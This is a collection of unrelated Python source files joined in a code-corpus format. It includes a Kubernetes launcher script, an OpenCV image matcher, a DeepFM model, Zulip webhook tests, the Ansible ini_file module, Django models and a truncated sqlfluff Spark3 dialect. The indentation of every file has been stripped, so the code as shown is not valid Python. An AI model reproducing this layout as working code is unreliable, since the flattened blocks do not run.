STATUS = os.execvp("java", filter_array(command.split(" ")))
#系统自定义的配置入参
def get_client_customopts():
ret = ("")
"""
ret = (" -Dkubernetes.root.logger=INFO,stdout -Dlogback.configurationFile=" + JKUBERNETES_DIR +
"/conf/client_logback.xml -Dlog4j.configuration=File:" + JKUBERNETES_DIR +
"/conf/client_log4j.properties")
"""
return ret
def get_classpath(extrajars):
ret = []
ret.extend(extrajars)
ret.extend(get_jars_full(JKUBERNETES_DIR))
ret.extend(get_jars_full(JKUBERNETES_DIR + "/lib"))
ret.extend(INCLUDE_JARS)
return normclasspath(":".join(ret))
def main():
if len(sys.argv) <= 1:
print_usage()
sys.exit(-1)
global CONFIG_OPTS
config_list, args = parse_config_opts_and_args(sys.argv[1:])
parse_config_opts(config_list)
COMMAND = args[0]
ARGS = args[1:]
if COMMANDS.get(COMMAND) == None:
unknown_command(COMMAND)
sys.exit(-1)
if len(ARGS) != 0 and ARGS[0] == "help":
print_usage(COMMAND)
sys.exit(0)
try:
(COMMANDS.get(COMMAND,"help"))(ARGS)
except Exception as msg:
print(msg)
print_usage(COMMAND)
sys.exit(-1)
sys.exit(STATUS)
COMMANDS = {"create": create,"kube":kube,"kubelet":kubelet,"delete":delete,"rolling-update":rollingUpdate,"replace":replace,"get":get}
if __name__ == "__main__":
#check_java()
main()
|
py | 1a305f413095051a324e8a035128541b13d6768f | import cv2
import numpy as np
from matplotlib import pyplot as plt
from .log import logger
MATCHER_DEBUG = False
FLANN_INDEX_KDTREE = 0
GOOD_DISTANCE_LIMIT = 0.7
SIFT = cv2.SIFT_create()
def is_in_poly(p, poly):
"""
:param p: [x, y]
:param poly: [[], [], [], [], ...]
:return:
"""
px, py = p
is_in = False
for i, corner in enumerate(poly):
next_i = i + 1 if i + 1 < len(poly) else 0
x1, y1 = corner
x2, y2 = poly[next_i]
if (x1 == px and y1 == py) or (x2 == px and y2 == py): # if point is on vertex
is_in = True
break
if min(y1, y2) < py <= max(y1, y2): # find horizontal edges of polygon
x = x1 + (py - y1) * (x2 - x1) / (y2 - y1)
if x == px: # if point is on edge
is_in = True
break
elif x > px: # if point is on left-side of line
is_in = not is_in
return is_in
class FlannBasedMatcher():
def __init__(self, origin):
self.origin = origin
self.kp, self.des = SIFT.detectAndCompute(origin, None)
logger.debug(f'FlannBasedMatcher init: shape ({origin.shape})')
def match(self, query, ret_square=True, draw=False, scope=None):
if self.des is None:
logger.debug('feature points is None')
if ret_square:
return None
return False
if scope is not None:
logger.debug(f'before: {len(self.kp)}')
logger.debug(f'scope: {scope}')
kp0, des0 = [], []
for kp, des in zip(self.kp, self.des):
if scope[0][0] <= kp.pt[0] and scope[0][1] <= kp.pt[1] and kp.pt[0] <= scope[1][0] and kp.pt[1] <= scope[1][1]:
kp0.append(kp)
des0.append(des)
logger.debug(f'after: {len(kp0)}')
kp0, des0 = np.array(kp0), np.array(des0)
else:
kp0, des0 = self.kp, self.des
h, w = query.shape
kp, des = SIFT.detectAndCompute(query, None)
index_params = dict(algorithm=FLANN_INDEX_KDTREE, trees=5)
search_params = dict(checks=50)
flann = cv2.FlannBasedMatcher(index_params, search_params)
matches = flann.knnMatch(des, des0, k=2)
"""store all the good matches as per Lowe's ratio test."""
good = []
for x, y in matches:
if x.distance < GOOD_DISTANCE_LIMIT * y.distance:
good.append(x)
"""draw the result"""
if draw:
result = cv2.drawMatches(
query, kp, self.origin, kp0, good, None)
plt.imshow(result, 'gray')
plt.show()
if len(good) <= 4 or len(good) / len(des) < 0.2:
logger.debug(
f'not enough good matches are found: {len(good)} / {len(matches)} / {len(des)} / {len(good) / len(des)}')
if ret_square:
return None
return False
"""get the coordinates of good matches"""
src_pts = np.float32(
[kp[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)
dst_pts = np.float32(
[kp0[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)
"""calculated transformation matrix and the mask"""
M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)
matchesMask = mask.ravel().tolist()
if M is None:
logger.debug('calculated transformation matrix failed')
if ret_square:
return None
return False
pts = np.float32([[0, 0], [0, h-1], [w-1, h-1],
[w-1, 0]]).reshape(-1, 1, 2)
dst = cv2.perspectiveTransform(pts, M)
dst_list = np.int32(dst).reshape(4, 2).tolist()
better = filter(lambda m: is_in_poly(
kp0[m.trainIdx].pt, dst_list), good)
better_kp_x = [kp[m.queryIdx].pt[0] for m in better]
if len(better_kp_x):
good_area_rate = np.ptp(better_kp_x) / w
else:
good_area_rate = 0
"""draw the result"""
if draw or MATCHER_DEBUG:
origin = np.array(self.origin)
cv2.polylines(origin, [np.int32(dst)], True, 0, 2, cv2.LINE_AA)
draw_params = dict(matchColor=(
0, 255, 0), singlePointColor=None, matchesMask=matchesMask, flags=2)
result = cv2.drawMatches(
query, kp, origin, kp0, good, None, **draw_params)
plt.imshow(result, 'gray')
plt.show()
if abs(dst[0][0][0] - dst[1][0][0]) > 30 or abs(dst[2][0][0] - dst[3][0][0]) > 30 or abs(dst[0][0][1] - dst[3][0][1]) > 30 or abs(dst[1][0][1] - dst[2][0][1]) > 30:
logger.debug(f'square is not rectangle: {dst_list}')
if ret_square:
return None
return False
if good_area_rate < 0.5:
logger.debug(f'good_area_rate is not enough: {good_area_rate}')
if ret_square:
return None
return False
logger.info(
f'matches: {len(good)} / {len(matches)} / {len(des)} / {len(good) / len(des)} / {good_area_rate}')
logger.debug(f'find in {dst_list}')
if ret_square:
return dst_list
return True
|
py | 1a305f93b025dff8077f2da2ea70fa4f020a9213 | # -*- coding:utf-8 -*-
"""
Author:
Weichen Shen,[email protected]
Reference:
[1] Guo H, Tang R, Ye Y, et al. Deepfm: a factorization-machine based neural network for ctr prediction[J]. arXiv preprint arXiv:1703.04247, 2017.(https://arxiv.org/abs/1703.04247)
"""
import tensorflow as tf
from ..input_embedding import preprocess_input_embedding, get_linear_logit
from ..layers.core import PredictionLayer, DNN
from ..layers.interaction import FM
from ..layers.utils import concat_fun
from ..utils import check_feature_config_dict
def DeepFM(feature_dim_dict, embedding_size=8,
use_fm=True, dnn_hidden_units=(128, 128), l2_reg_linear=0.00001, l2_reg_embedding=0.00001, l2_reg_dnn=0,
init_std=0.0001, seed=1024, dnn_dropout=0, dnn_activation='relu', dnn_use_bn=False, task='binary'):
"""Instantiates the DeepFM Network architecture.
:param feature_dim_dict: dict,to indicate sparse field and dense field like {'sparse':{'field_1':4,'field_2':3,'field_3':2},'dense':['field_4','field_5']}
:param embedding_size: positive integer,sparse feature embedding_size
:param use_fm: bool,use FM part or not
:param dnn_hidden_units: list,list of positive integer or empty list, the layer number and units in each layer of DNN
:param l2_reg_linear: float. L2 regularizer strength applied to linear part
:param l2_reg_embedding: float. L2 regularizer strength applied to embedding vector
:param l2_reg_dnn: float. L2 regularizer strength applied to DNN
:param init_std: float,to use as the initialize std of embedding vector
:param seed: integer ,to use as random seed.
:param dnn_dropout: float in [0,1), the probability we will drop out a given DNN coordinate.
:param dnn_activation: Activation function to use in DNN
:param dnn_use_bn: bool. Whether use BatchNormalization before activation or not in DNN
:param task: str, ``"binary"`` for binary logloss or ``"regression"`` for regression loss
:return: A Keras model instance.
"""
check_feature_config_dict(feature_dim_dict)
deep_emb_list, linear_emb_list, dense_input_dict, inputs_list = preprocess_input_embedding(feature_dim_dict,
embedding_size,
l2_reg_embedding,
l2_reg_linear, init_std,
seed,
create_linear_weight=True)
linear_logit = get_linear_logit(linear_emb_list, dense_input_dict, l2_reg_linear)
fm_input = concat_fun(deep_emb_list, axis=1)
deep_input = tf.keras.layers.Flatten()(fm_input)
fm_out = FM()(fm_input)
deep_out = DNN(dnn_hidden_units, dnn_activation, l2_reg_dnn, dnn_dropout,
dnn_use_bn, seed)(deep_input)
deep_logit = tf.keras.layers.Dense(
1, use_bias=False, activation=None)(deep_out)
if len(dnn_hidden_units) == 0 and use_fm == False: # only linear
final_logit = linear_logit
elif len(dnn_hidden_units) == 0 and use_fm == True: # linear + FM
final_logit = tf.keras.layers.add([linear_logit, fm_out])
elif len(dnn_hidden_units) > 0 and use_fm == False: # linear + Deep
final_logit = tf.keras.layers.add([linear_logit, deep_logit])
elif len(dnn_hidden_units) > 0 and use_fm == True: # linear + FM + Deep
final_logit = tf.keras.layers.add([linear_logit, fm_out, deep_logit])
else:
raise NotImplementedError
output = PredictionLayer(task)(final_logit)
model = tf.keras.models.Model(inputs=inputs_list, outputs=output)
return model
|
py | 1a305ffdb17c2cb3c68761e651cdef0d1f01d549 | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyWidgetsnbextension(PythonPackage):
"""IPython HTML widgets for Jupyter"""
homepage = "https://pypi.python.org/pypi/widgetsnbextension"
url = "https://pypi.io/packages/source/w/widgetsnbextension/widgetsnbextension-1.2.6.tar.gz"
version('1.2.6', '0aa4e152c9ba2d704389dc2453f448c7')
depends_on('py-setuptools', type='build')
depends_on('[email protected]:2.8,3.3:')
depends_on('[email protected]:', type=('build', 'run'))
|
py | 1a306050302d9dc0044c00e81353241d282bb2b0 | from zerver.lib.test_classes import WebhookTestCase
TOPIC = "Zulip HQ"
class BasecampHookTests(WebhookTestCase):
STREAM_NAME = "basecamp"
URL_TEMPLATE = "/api/v1/external/basecamp?stream={stream}&api_key={api_key}"
FIXTURE_DIR_NAME = "basecamp"
def test_basecamp_makes_doc_active(self) -> None:
expected_message = "Tomasz activated the document [New doc](https://3.basecamp.com/3688623/buckets/2957043/documents/432522214)."
self._send_and_test_message("doc_active", expected_message)
def test_basecamp_makes_doc_archived(self) -> None:
expected_message = "Tomasz archived the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988)."
self._send_and_test_message("doc_archived", expected_message)
def test_basecamp_makes_doc_changed_content(self) -> None:
expected_message = "Tomasz changed content of the document [New doc edit](https://3.basecamp.com/3688623/buckets/2957043/documents/432522214)."
self._send_and_test_message("doc_content_changed", expected_message)
def test_basecamp_makes_doc_changed_title(self) -> None:
expected_message = "Tomasz changed title of the document [New doc edit](https://3.basecamp.com/3688623/buckets/2957043/documents/432522214)."
self._send_and_test_message("doc_title_changed", expected_message)
def test_basecamp_makes_doc_publicized(self) -> None:
expected_message = "Tomasz publicized the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988)."
self._send_and_test_message("doc_publicized", expected_message)
def test_basecamp_makes_doc_created(self) -> None:
expected_message = "Tomasz created the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988)."
self._send_and_test_message("doc_created", expected_message)
def test_basecamp_makes_doc_trashed(self) -> None:
expected_message = "Tomasz trashed the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988)."
self._send_and_test_message("doc_trashed", expected_message)
def test_basecamp_makes_doc_unarchived(self) -> None:
expected_message = "Tomasz unarchived the document [new doc](https://3.basecamp.com/3688623/buckets/2957043/documents/434455988)."
self._send_and_test_message("doc_unarchive", expected_message)
def test_basecamp_makes_questions_answer_archived(self) -> None:
expected_message = "Tomasz archived the [answer](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747/answers/2017-03-16#__recording_432529636) of the question [Question?](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)"
self._send_and_test_message("questions_answer_archived", expected_message)
def test_basecamp_makes_questions_answer_content_changed(self) -> None:
expected_message = "Tomasz changed content of the [answer](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747/answers/2017-03-16#__recording_432529636) of the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)."
self._send_and_test_message("questions_answer_content_changed", expected_message)
def test_basecamp_makes_questions_answer_created(self) -> None:
expected_message = "Tomasz created the [answer](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747/answers/2017-03-16#__recording_432529636) of the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)."
self._send_and_test_message("questions_answer_created", expected_message)
def test_basecamp_makes_questions_answer_trashed(self) -> None:
expected_message = "Tomasz trashed the [answer](https://3.basecamp.com/3688623/buckets/2957043/question_answers/432529636) of the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)."
self._send_and_test_message("questions_answer_trashed", expected_message)
def test_basecamp_makes_questions_answer_unarchived(self) -> None:
expected_message = "Tomasz unarchived the [answer](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747/answers/2017-03-16#__recording_432529636) of the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)."
self._send_and_test_message("questions_answer_unarchived", expected_message)
def test_basecamp_makes_question_archived(self) -> None:
expected_message = "Tomasz archived the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)."
self._send_and_test_message("question_archived", expected_message)
def test_basecamp_makes_question_created(self) -> None:
expected_message = "Tomasz created the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)."
self._send_and_test_message("question_created", expected_message)
def test_basecamp_makes_question_trashed(self) -> None:
expected_message = "Tomasz trashed the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)."
self._send_and_test_message("question_trashed", expected_message)
def test_basecamp_makes_question_unarchived(self) -> None:
expected_message = "Tomasz unarchived the question [Question](https://3.basecamp.com/3688623/buckets/2957043/questions/432527747)."
self._send_and_test_message("question_unarchived", expected_message)
def test_basecamp_makes_message_archived(self) -> None:
expected_message = "Tomasz archived the message [Message Title new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605)."
self._send_and_test_message("message_archived", expected_message)
def test_basecamp_makes_message_content_change(self) -> None:
expected_message = "Tomasz changed content of the message [Message Title new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605)."
self._send_and_test_message("message_content_changed", expected_message)
def test_basecamp_makes_message_created(self) -> None:
expected_message = "Tomasz created the message [Message Title](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605)."
self._send_and_test_message("message_created", expected_message)
def test_basecamp_makes_message_title_change(self) -> None:
expected_message = "Tomasz changed subject of the message [Message Title new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605)."
self._send_and_test_message("message_title_changed", expected_message)
def test_basecamp_makes_message_trashed(self) -> None:
expected_message = "Tomasz trashed the message [Message Title new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605)."
self._send_and_test_message("message_trashed", expected_message)
def test_basecamp_makes_message_unarchived(self) -> None:
expected_message = "Tomasz unarchived the message [Message Title new](https://3.basecamp.com/3688623/buckets/2957043/messages/430680605)."
self._send_and_test_message("message_unarchived", expected_message)
def test_basecamp_makes_todo_list_created(self) -> None:
expected_message = "Tomasz created the todo list [NEW TO DO LIST](https://3.basecamp.com/3688623/buckets/2957043/todolists/427050190)."
self._send_and_test_message("todo_list_created", expected_message)
def test_basecamp_makes_todo_list_description_changed(self) -> None:
expected_message = "Tomasz changed description of the todo list [NEW TO DO LIST](https://3.basecamp.com/3688623/buckets/2957043/todolists/427050190)."
self._send_and_test_message("todo_list_description_changed", expected_message)
def test_basecamp_makes_todo_list_modified(self) -> None:
expected_message = "Tomasz changed name of the todo list [NEW Name TO DO LIST](https://3.basecamp.com/3688623/buckets/2957043/todolists/427050190)."
self._send_and_test_message("todo_list_name_changed", expected_message)
def test_basecamp_makes_todo_assignment_changed(self) -> None:
expected_message = "Tomasz changed assignment of the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624)."
self._send_and_test_message("todo_assignment_changed", expected_message)
def test_basecamp_makes_todo_completed(self) -> None:
expected_message = "Tomasz completed the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624)."
self._send_and_test_message("todo_completed", expected_message)
def test_basecamp_makes_todo_uncompleted(self) -> None:
expected_message = "Tomasz uncompleted the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624)."
self._send_and_test_message("todo_uncompleted", expected_message)
def test_basecamp_makes_todo_created(self) -> None:
expected_message = "Tomasz created the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624)."
self._send_and_test_message("todo_created", expected_message)
def test_basecamp_makes_todo_due_on_changed(self) -> None:
expected_message = "Tomasz changed due_on of the todo task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624)."
self._send_and_test_message("todo_due_on_changed", expected_message)
def test_basecamp_makes_comment_created(self) -> None:
expected_message = "Tomasz created the [comment](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624#__recording_427058780) of the task [New task](https://3.basecamp.com/3688623/buckets/2957043/todos/427055624)."
self._send_and_test_message("comment_created", expected_message)
def _send_and_test_message(self, fixture_name: str, expected_message: str) -> None:
self.check_webhook(fixture_name, TOPIC, expected_message)
|
py | 1a30612dcf636e3419486806c0248885beb3a88e | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2012, Jan-Piet Mens <jpmens () gmail.com>
# Copyright: (c) 2015, Ales Nosek <anosek.nosek () gmail.com>
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = r'''
---
module: ini_file
short_description: Tweak settings in INI files
extends_documentation_fragment: files
description:
- Manage (add, remove, change) individual settings in an INI-style file without having
to manage the file as a whole with, say, M(ansible.builtin.template) or M(ansible.builtin.assemble).
- Adds missing sections if they don't exist.
- Before Ansible 2.0, comments are discarded when the source file is read, and therefore will not show up in the destination file.
- Since Ansible 2.3, this module adds missing ending newlines to files to keep in line with the POSIX standard, even when
no other modifications need to be applied.
options:
path:
description:
- Path to the INI-style file; this file is created if required.
- Before Ansible 2.3 this option was only usable as I(dest).
type: path
required: true
aliases: [ dest ]
section:
description:
- Section name in INI file. This is added if C(state=present) automatically when
a single value is being set.
- If left empty or set to C(null), the I(option) will be placed before the first I(section).
- Using C(null) is also required if the config format does not support sections.
type: str
required: true
option:
description:
- If set (required for changing a I(value)), this is the name of the option.
- May be omitted if adding/removing a whole I(section).
type: str
value:
description:
- The string value to be associated with an I(option).
- May be omitted when removing an I(option).
type: str
backup:
description:
- Create a backup file including the timestamp information so you can get
the original file back if you somehow clobbered it incorrectly.
type: bool
default: no
state:
description:
- If set to C(absent) the option or section will be removed if present instead of created.
type: str
choices: [ absent, present ]
default: present
no_extra_spaces:
description:
- Do not insert spaces before and after '=' symbol.
type: bool
default: no
create:
description:
- If set to C(no), the module will fail if the file does not already exist.
- By default it will create the file if it is missing.
type: bool
default: yes
allow_no_value:
description:
- Allow option without value and without '=' symbol.
type: bool
default: no
notes:
- While it is possible to add an I(option) without specifying a I(value), this makes no sense.
- As of Ansible 2.3, the I(dest) option has been changed to I(path) as default, but I(dest) still works as well.
author:
- Jan-Piet Mens (@jpmens)
- Ales Nosek (@noseka1)
'''
EXAMPLES = r'''
# Before Ansible 2.3, option 'dest' was used instead of 'path'
- name: Ensure "fav=lemonade is in section "[drinks]" in specified file
community.general.ini_file:
path: /etc/conf
section: drinks
option: fav
value: lemonade
mode: '0600'
backup: yes
- name: Ensure "temperature=cold is in section "[drinks]" in specified file
community.general.ini_file:
path: /etc/anotherconf
section: drinks
option: temperature
value: cold
backup: yes
'''
import os
import re
import tempfile
import traceback
from ansible.module_utils.basic import AnsibleModule
def match_opt(option, line):
option = re.escape(option)
return re.match('( |\t)*%s( |\t)*(=|$)' % option, line) \
or re.match('#( |\t)*%s( |\t)*(=|$)' % option, line) \
or re.match(';( |\t)*%s( |\t)*(=|$)' % option, line)
def match_active_opt(option, line):
option = re.escape(option)
return re.match('( |\t)*%s( |\t)*(=|$)' % option, line)
def do_ini(module, filename, section=None, option=None, value=None,
state='present', backup=False, no_extra_spaces=False, create=True,
allow_no_value=False):
diff = dict(
before='',
after='',
before_header='%s (content)' % filename,
after_header='%s (content)' % filename,
)
if not os.path.exists(filename):
if not create:
module.fail_json(rc=257, msg='Destination %s does not exist !' % filename)
destpath = os.path.dirname(filename)
if not os.path.exists(destpath) and not module.check_mode:
os.makedirs(destpath)
ini_lines = []
else:
ini_file = open(filename, 'r')
try:
ini_lines = ini_file.readlines()
finally:
ini_file.close()
if module._diff:
diff['before'] = ''.join(ini_lines)
changed = False
# ini file could be empty
if not ini_lines:
ini_lines.append('\n')
# last line of file may not contain a trailing newline
if ini_lines[-1] == "" or ini_lines[-1][-1] != '\n':
ini_lines[-1] += '\n'
changed = True
# append fake section lines to simplify the logic
# At top:
# Fake random section to do not match any other in the file
# Using commit hash as fake section name
fake_section_name = "ad01e11446efb704fcdbdb21f2c43757423d91c5"
# Insert it at the beginning
ini_lines.insert(0, '[%s]' % fake_section_name)
# At botton:
ini_lines.append('[')
# If no section is defined, fake section is used
if not section:
section = fake_section_name
within_section = not section
section_start = 0
msg = 'OK'
if no_extra_spaces:
assignment_format = '%s=%s\n'
else:
assignment_format = '%s = %s\n'
for index, line in enumerate(ini_lines):
if line.startswith('[%s]' % section):
within_section = True
section_start = index
elif line.startswith('['):
if within_section:
if state == 'present':
# insert missing option line at the end of the section
for i in range(index, 0, -1):
# search backwards for previous non-blank or non-comment line
if not re.match(r'^[ \t]*([#;].*)?$', ini_lines[i - 1]):
if not value and allow_no_value:
ini_lines.insert(i, '%s\n' % option)
else:
ini_lines.insert(i, assignment_format % (option, value))
msg = 'option added'
changed = True
break
elif state == 'absent' and not option:
# remove the entire section
del ini_lines[section_start:index]
msg = 'section removed'
changed = True
break
else:
if within_section and option:
if state == 'present':
# change the existing option line
if match_opt(option, line):
if not value and allow_no_value:
newline = '%s\n' % option
else:
newline = assignment_format % (option, value)
option_changed = ini_lines[index] != newline
changed = changed or option_changed
if option_changed:
msg = 'option changed'
ini_lines[index] = newline
if option_changed:
# remove all possible option occurrences from the rest of the section
index = index + 1
while index < len(ini_lines):
line = ini_lines[index]
if line.startswith('['):
break
if match_active_opt(option, line):
del ini_lines[index]
else:
index = index + 1
break
elif state == 'absent':
# delete the existing line
if match_active_opt(option, line):
del ini_lines[index]
changed = True
msg = 'option changed'
break
# remove the fake section line
del ini_lines[0]
del ini_lines[-1:]
if not within_section and option and state == 'present':
ini_lines.append('[%s]\n' % section)
if not value and allow_no_value:
ini_lines.append('%s\n' % option)
else:
ini_lines.append(assignment_format % (option, value))
changed = True
msg = 'section and option added'
if module._diff:
diff['after'] = ''.join(ini_lines)
backup_file = None
if changed and not module.check_mode:
if backup:
backup_file = module.backup_local(filename)
try:
tmpfd, tmpfile = tempfile.mkstemp(dir=module.tmpdir)
f = os.fdopen(tmpfd, 'w')
f.writelines(ini_lines)
f.close()
except IOError:
module.fail_json(msg="Unable to create temporary file %s", traceback=traceback.format_exc())
try:
module.atomic_move(tmpfile, filename)
except IOError:
module.ansible.fail_json(msg='Unable to move temporary \
file %s to %s, IOError' % (tmpfile, filename), traceback=traceback.format_exc())
return (changed, backup_file, diff, msg)
def main():
module = AnsibleModule(
argument_spec=dict(
path=dict(type='path', required=True, aliases=['dest']),
section=dict(type='str', required=True),
option=dict(type='str'),
value=dict(type='str'),
backup=dict(type='bool', default=False),
state=dict(type='str', default='present', choices=['absent', 'present']),
no_extra_spaces=dict(type='bool', default=False),
allow_no_value=dict(type='bool', default=False),
create=dict(type='bool', default=True)
),
add_file_common_args=True,
supports_check_mode=True,
)
path = module.params['path']
section = module.params['section']
option = module.params['option']
value = module.params['value']
state = module.params['state']
backup = module.params['backup']
no_extra_spaces = module.params['no_extra_spaces']
allow_no_value = module.params['allow_no_value']
create = module.params['create']
(changed, backup_file, diff, msg) = do_ini(module, path, section, option, value, state, backup, no_extra_spaces, create, allow_no_value)
if not module.check_mode and os.path.exists(path):
file_args = module.load_file_common_arguments(module.params)
changed = module.set_fs_attributes_if_different(file_args, changed)
results = dict(
changed=changed,
diff=diff,
msg=msg,
path=path,
)
if backup_file is not None:
results['backup_file'] = backup_file
# Mission complete
module.exit_json(**results)
if __name__ == '__main__':
main()
|
py | 1a30616824a44a70a2e71e958137e9cfc4f8c4b0 | from flask import request, jsonify
import json
from urllib import parse as urlparse
import time
import sys
import sqlite3
from dnfp import app, apputils
from inventory import Inventory
from skilltree import SkillTree
from character import Character
from libutil import LibUtil as myutil
def get_neople_ids(name, server):
server_dict={'안톤':'anton','바칼':'bakal','카인':'cain','카시야스':'casillas',
'디레지에':'diregie','힐더':'hilder','프레이':'prey','시로코':'siroco'}
s_id=server_dict[server]
cha_id_url = 'servers/'+s_id+'/characters?characterName='+urlparse.quote(name)+'&'
try:
cha_id_dic=myutil.load_api(cha_id_url)
except:
raise
cha_id=cha_id_dic['rows'][0]['characterId']
return s_id, cha_id
def create_char_json(s_id, cha_id, test_mode = False, epic_status = False):
character = Character(cha_id, s_id, test_mode, custom_data = None)
if character.status[0] != 'ok':
return character.status[1]
character.do_create_char_dict(epic_status, None)
return character.char_stat
def make_char_stat(s_id, cha_id, test_mode = False, epic_status = True):
char_stat = create_char_json(s_id, cha_id, test_mode = test_mode, epic_status = epic_status)
return char_stat
@app.route("/char", methods=("GET", "POST"))
def char_stat():
name = request.args.get("name")
server = request.args.get("server")
sid, cid = get_neople_ids(name, server)
char_stat = make_char_stat(sid, cid, test_mode = False, epic_status = False)
return jsonify(char_stat)
|
py | 1a30623e7acadb9a2f7c33096cf251952d89f382 | from django.db import models
from django.contrib.auth.models import User
class SessionTable(models.Model):
sess_id = models.CharField(max_length=15)
name = models.CharField(max_length=15)
class VoteTable(models.Model):
value = models.IntegerField()
user = models.ForeignKey(User, on_delete=models.CASCADE)
sess_id = models.OneToOneField(SessionTable, on_delete=models.CASCADE)
class SessionResults(models.Model):
value = models.IntegerField()
user = models.ForeignKey(User, on_delete=models.CASCADE)
|
py | 1a306362979e503de7a689895ed1e53a36f78d0a | """The Spark SQL dialect for ANSI Compliant Spark3.
Inherits from ANSI.
Spark SQL ANSI Mode is more restrictive regarding
keywords than the Default Mode, and still shares
some syntax with hive.
Based on:
- https://spark.apache.org/docs/latest/sql-ref.html
- https://spark.apache.org/docs/latest/sql-ref-ansi-compliance.html
- https://github.com/apache/spark/blob/master/sql/catalyst/src/main/antlr4/org/apache/spark/sql/catalyst/parser/SqlBase.g4
"""
from sqlfluff.core.parser import (
AnyNumberOf,
BaseSegment,
Bracketed,
CommentSegment,
Conditional,
Dedent,
Delimited,
Indent,
NamedParser,
OneOf,
OptionallyBracketed,
Ref,
RegexLexer,
Sequence,
StringParser,
SymbolSegment,
Anything,
)
from sqlfluff.core.dialects import load_raw_dialect
from sqlfluff.core.parser.segments.raw import CodeSegment, KeywordSegment
from sqlfluff.dialects.dialect_spark3_keywords import (
RESERVED_KEYWORDS,
UNRESERVED_KEYWORDS,
)
ansi_dialect = load_raw_dialect("ansi")
hive_dialect = load_raw_dialect("hive")
spark3_dialect = ansi_dialect.copy_as("spark3")
spark3_dialect.patch_lexer_matchers(
[
# Spark SQL, only -- is used for single-line comment
RegexLexer(
"inline_comment",
r"(--)[^\n]*",
CommentSegment,
segment_kwargs={"trim_start": "--"},
),
# == and <=> are valid equal operations
# <=> is a non-null equals in Spark SQL
# https://spark.apache.org/docs/latest/api/sql/index.html#_10
RegexLexer("equals", r"=|==|<=>", CodeSegment),
# identifiers are delimited with `
# within a delimited identifier, ` is used to escape special characters, including `
# Ex: select `delimited `` with escaped` from `just delimited`
# https://spark.apache.org/docs/latest/sql-ref-identifier.html#delimited-identifier
RegexLexer("back_quote", r"`([^`]|``)*`", CodeSegment),
]
)
# Set the bare functions
spark3_dialect.sets("bare_functions").clear()
spark3_dialect.sets("bare_functions").update(
[
"CURRENT_DATE",
"CURRENT_TIMESTAMP",
"CURRENT_USER",
]
)
# Set the datetime units
spark3_dialect.sets("datetime_units").clear()
spark3_dialect.sets("datetime_units").update(
[
"YEAR",
# Alternate syntax for YEAR
"YYYY",
"YY",
"QUARTER",
"MONTH",
# Alternate syntax for MONTH
"MON",
"MM",
"WEEK",
"DAY",
# Alternate syntax for DAY
"DD",
"HOUR",
"MINUTE",
"SECOND",
]
)
# Set Keywords
spark3_dialect.sets("unreserved_keywords").update(UNRESERVED_KEYWORDS)
spark3_dialect.sets("reserved_keywords").update(RESERVED_KEYWORDS)
# Set Angle Bracket Pairs
spark3_dialect.sets("angle_bracket_pairs").update(
[
("angle", "StartAngleBracketSegment", "EndAngleBracketSegment", False),
]
)
# Real Segments
spark3_dialect.replace(
ComparisonOperatorGrammar=OneOf(
Ref("EqualsSegment"),
Ref("EqualsSegment_a"),
Ref("EqualsSegment_b"),
Ref("GreaterThanSegment"),
Ref("LessThanSegment"),
Ref("GreaterThanOrEqualToSegment"),
Ref("LessThanOrEqualToSegment"),
Ref("NotEqualToSegment"),
Ref("LikeOperatorSegment"),
),
TemporaryGrammar=Sequence(
Sequence("GLOBAL", optional=True),
OneOf("TEMP", "TEMPORARY"),
),
QuotedIdentifierSegment=NamedParser(
"back_quote",
CodeSegment,
name="quoted_identifier",
type="identifier",
trim_chars=("`",),
),
)
spark3_dialect.add(
# Add Hive Segments TODO : Is there a way to retrieve this w/o redefining?
DoubleQuotedLiteralSegment=NamedParser(
"double_quote",
CodeSegment,
name="quoted_literal",
type="literal",
trim_chars=('"',),
),
JsonfileKeywordSegment=StringParser(
"JSONFILE",
KeywordSegment,
name="json_file",
type="file_format",
),
RcfileKeywordSegment=StringParser(
"RCFILE", KeywordSegment, name="rc_file", type="file_format"
),
SequencefileKeywordSegment=StringParser(
"SEQUENCEFILE", KeywordSegment, name="sequence_file", type="file_format"
),
TextfileKeywordSegment=StringParser(
"TEXTFILE", KeywordSegment, name="text_file", type="file_format"
),
StartAngleBracketSegment=StringParser(
"<", SymbolSegment, name="start_angle_bracket", type="start_angle_bracket"
),
EndAngleBracketSegment=StringParser(
">", SymbolSegment, name="end_angle_bracket", type="end_angle_bracket"
),
